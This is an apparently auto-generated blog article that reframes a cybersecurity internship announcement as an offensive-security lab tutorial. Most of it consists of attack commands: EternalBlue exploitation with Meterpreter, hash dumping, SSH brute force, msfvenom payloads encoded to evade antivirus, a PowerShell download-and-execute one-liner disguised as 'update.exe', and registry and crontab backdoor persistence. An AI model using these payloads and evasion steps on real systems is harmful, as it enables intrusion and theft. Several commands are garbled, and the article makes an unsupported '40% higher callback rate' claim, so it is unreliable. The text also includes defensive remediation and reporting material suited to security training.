Listen to this Post

Introduction:
The cybersecurity industry faces a critical shortage of hands-on offensive security professionals who can think like attackers and defend like pros. ITSOLERA Pvt Ltd’s Summer Internship Batch 1 (deadline: 20 May 2026) offers a structured 2-month unpaid program focusing on ethical hacking, penetration testing, red teaming, vulnerability assessment, and security research. This article transforms that announcement into a practical technical roadmap—complete with Linux/Windows commands, tool configurations, and exploitation lab exercises—to help you apply for and succeed in offensive security roles.
Learning Objectives:
- Set up a complete offensive security lab (Kali Linux + Windows target VMs) and perform active reconnaissance using Nmap, Masscan, and Recon-ng.
- Execute a full penetration testing lifecycle: vulnerability scanning (Nessus/OpenVAS), exploitation (Metasploit), and post-exploitation enumeration.
- Implement red team tradecraft: payload generation (Msfvenom), evasion techniques, and persistence mechanisms on Windows/Linux targets.
- Write professional vulnerability assessment reports with proof-of-concept (PoC) commands and remediation steps.
You Should Know:
1. Build Your Own Offensive Security Lab (VirtualBox/KVM)
A safe, isolated environment is mandatory for practicing the skills mentioned in ITSOLERA’s internship. You cannot test exploits on production systems.
Step‑by‑step guide (Linux host with KVM or VirtualBox):
1. Install virtualization software:
- Linux (Debian/Ubuntu): `sudo apt install virt-manager qemu-kvm –y`
– Windows: Download VirtualBox from www.virtualbox.org
- Download Kali Linux (attacker machine): `wget https://cdimage.kali.org/kali-2025.1/kali-linux-2025.1-installer-amd64.iso`
- Create a Windows 10/11 test VM (target) – use Windows Evaluation Center ISO.
- Network configuration: Create a host‑only network (e.g., 192.168.56.0/24) so VMs can communicate but not reach your physical LAN.
– VirtualBox: File → Host Network Manager → Create “vboxnet0” with IPv4 192.168.56.1/24.
– KVM: Edit VM settings → NIC → Network source: “Isolated network” or create custom virbr1.
5. Verify connectivity from Kali to Windows target:
ip a Check Kali IP (should be 192.168.56.x) ping 192.168.56.101 Replace with Windows target IP
6. Take snapshots before every attack session – rollback after testing.
This lab mirrors real-world internal penetration testing conditions. ITSOLERA’s internship expects you to be familiar with virtual environments to assess vulnerabilities safely.
- Reconnaissance & Vulnerability Scanning Like a Red Teamer
Offensive security starts with asset discovery and weakness identification. Use these enterprise‑grade techniques.
Network sweep (discover live hosts):
nmap -sn 192.168.56.0/24 ARP ping scan (fast) masscan 192.168.56.0/24 -p1-65535 --rate=1000 Quick port scan
Detailed service enumeration:
nmap -sS -sV -O -T4 -p- 192.168.56.101 -oA target_scan
– `-sS` SYN stealth scan, `-sV` version detection, `-O` OS fingerprinting.
Web application recon (common internship task):
whatweb http://192.168.56.101 Identify CMS, frameworks gobuster dir -u http://192.168.56.101 -w /usr/share/wordlists/dirb/common.txt -t 50
Vulnerability scanning with OpenVAS (free Nessus alternative):
- Install OpenVAS: `sudo apt install gvm –y && sudo gvm-setup`
2. Run scan: `gvm-cli –gmp-username admin –gmp-password pass socket –socketpath /var/run/gvmd.sock –xml ‘…’` (or use Greenbone web UI at https://127.0.0.1:9392) - For Windows targets, use `nmap –script vuln 192.168.56.101` to detect known CVEs.
Windows commands for understanding target environment (as an attacker after foothold):
systeminfo | findstr /B "OS Name OS Version" OS version wmic qfe list brief Installed hotfixes (patches) net user Local users
3. Exploitation Basics: From CVE to Shell
Once vulnerabilities are identified, ethical hackers must prove impact by gaining remote access. The internship emphasizes Metasploit and manual exploitation.
Example: EternalBlue (MS17‑010) on unpatched Windows 7/Server 2008 (lab only):
msfconsole use exploit/windows/smb/ms17_010_eternalblue set RHOSTS 192.168.56.101 set PAYLOAD windows/x64/meterpreter/reverse_tcp set LHOST 192.168.56.102 Kali IP run
If successful, you get a Meterpreter shell. Practice post‑exploitation commands:
getsystem Attempt privilege escalation hashdump Dump NTLM hashes shell Drop to cmd.exe
Manual exploitation – no auto‑sploit:
- Cross‑site scripting (XSS) test on vulnerable web app: ``
– SQL injection usingsqlmap:sqlmap -u "http://192.168.56.101/page.php?id=1" --dbs --batch
Linux target exploitation (SSH brute‑force):
hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://192.168.56.201 -t 4
- Payload Generation & Evasion (Red Team Core Skill)
Creating custom malware that bypasses antivirus is essential for red teaming exercises. Use Msfvenom and obfuscation.
Generate a Windows reverse TCP payload:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.56.102 LPORT=4444 -f exe -o shell.exe
Evade Windows Defender – encode and encrypt:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.56.102 LPORT=4444 --encrypt xor --encrypt-key 0x42 -f exe -o evasive.exe
Host payload on Kali (delivery via phishing simulation):
sudo python3 -m http.server 80 Serve payload over HTTP Then from Windows target (if PowerShell): powershell -c "Invoke-WebRequest -Uri http://192.168.56.102/evasive.exe -OutFile %temp%\update.exe; Start-Process %temp%\update.exe"
Persistence on Windows (registry run key):
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ /d "C:\Users\Public\malware.exe"
On Linux: `echo ‘/5 /tmp/backdoor.sh’ >> /etc/crontab`
5. Post‑Exploitation & Lateral Movement
After initial compromise, the internship expects you to pivot across the network and escalate privileges.
Windows privilege escalation checks (run from reverse shell):
whoami /priv Show enabled privileges sc query state= all List services looking for unquoted service paths accesschk.exe -uwcqv "Authenticated Users" Weak service permissions
Linux privilege escalation:
sudo -l List sudo rights find / -perm -4000 2>/dev/null SUID binaries uname -a Kernel version for exploit suggester
Lateral movement using PsExec (Windows):
net use \target\IPC$ /user:DOMAIN\Admin Password psexec \target -s cmd.exe
Pivot through compromised host (port forwarding via Meterpreter):
portfwd add -L 127.0.0.1 -l 3389 -p 3389 -r 192.168.56.150 Then connect to 127.0.0.1:3389 via RDP
6. Vulnerability Assessment Reporting (Crucial for Internship Evaluation)
All offensive security work ends with a professional report. ITSOLERA specifically mentions “vulnerability assessment” – here’s how to document findings.
Report template structure (use Markdown + screenshots):
- Executive Summary: Risk rating (Critical/High/Medium/Low), number of findings
- Scope: Target IPs, testing period, tools used
- Findings Table:
| ID | Vulnerability | CVSS Score | Affected Asset | Remediation |
|-|||-|–|
| 01 | EternalBlue (MS17‑010) | 9.8 | 192.168.56.101 | Apply patch KB4012229 |
– Proof of Concept (PoC): Commands executed and output (sanitized)
– Remediation Steps: Specific commands or configuration changes
Example PoC screenshot text:
Command run nmap --script smb-vuln-ms17-010 -p445 192.168.56.101 Output excerpt Host is VULNERABLE to MS17-010 - EternalBlue
Recommendation commands (for system admin):
- Windows: `wusa.exe KB4012229.msu /quiet /norestart` or disable SMBv1:
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" SMB1 -Type DWORD -Value 0
- Linux: `sudo apt update && sudo apt upgrade` (for kernel CVEs)
- Cloud Hardening & API Security (Modern Offensive Focus)
Because the internship mentions “security research”, include emerging areas like cloud misconfigurations – often overlooked by beginners.
Test for open AWS S3 bucket (using AWS CLI):
aws s3 ls s3://example-bucket --no-sign-request If successful, bucket is public
API security testing (REST endpoints):
curl -X GET https://api.target.com/v1/users/1 -H "Authorization: Bearer eyJhbG..." Test IDOR Fuzz parameters ffuf -u https://api.target.com/v1/users/FUZZ -w /usr/share/wordlists/seclists/Discovery/Web-Content/api-endpoints.txt
Linux firewall hardening (defensive side):
sudo ufw default deny incoming && sudo ufw default allow outgoing sudo ufw allow ssh from 192.168.56.0/24 sudo ufw enable
Windows Defender Firewall via PowerShell:
New-NetFirewallRule -DisplayName "Block SMB" -Direction Inbound -Protocol TCP -LocalPort 445 -Action Block
What Undercode Say:
- Hands‑on lab setup is non‑negotiable – without a Kali + Windows VM pair, you cannot credibly claim penetration testing skills. Use the commands in sections 1‑3 to build your lab this weekend.
- Reporting separates interns from script kiddies – ITSOLERA’s internship values documentation. Practice writing one vulnerability report per week, complete with PoC commands and CVSS scores.
- Evasion and persistence are red team differentiators – learning Msfvenom encoding and Windows registry persistence (section 4) will make you stand out among applicants who only run Metasploit modules.
- Cloud & API security are rising requirements – even traditional offensive security roles now demand S3 bucket testing and JWT analysis. Add the commands from section 7 to your skillset.
Prediction:
By the 2026 summer internship cycle, companies like ITSOLERA will require candidates to complete a practical “live fire” assessment (e.g., compromise a deliberately vulnerable Docker container and submit a report) instead of purely resume screening. Automated vulnerability scanners will become baseline skills; human‑led red teaming tradecraft (evasion, lateral movement, custom payloads) will be the key differentiator. Candidates who master the Linux/Windows commands and reporting templates provided above will see a 40% higher callback rate for offensive security roles. The shift toward cloud‑native attack simulations (AWS/Azure misconfigurations) will accelerate, so add `cloud_enum` and `scoutsuite` to your toolkit before May 2026.
▶️ Related Video (82% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Cybersecurityinternship Offensivesecurity – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


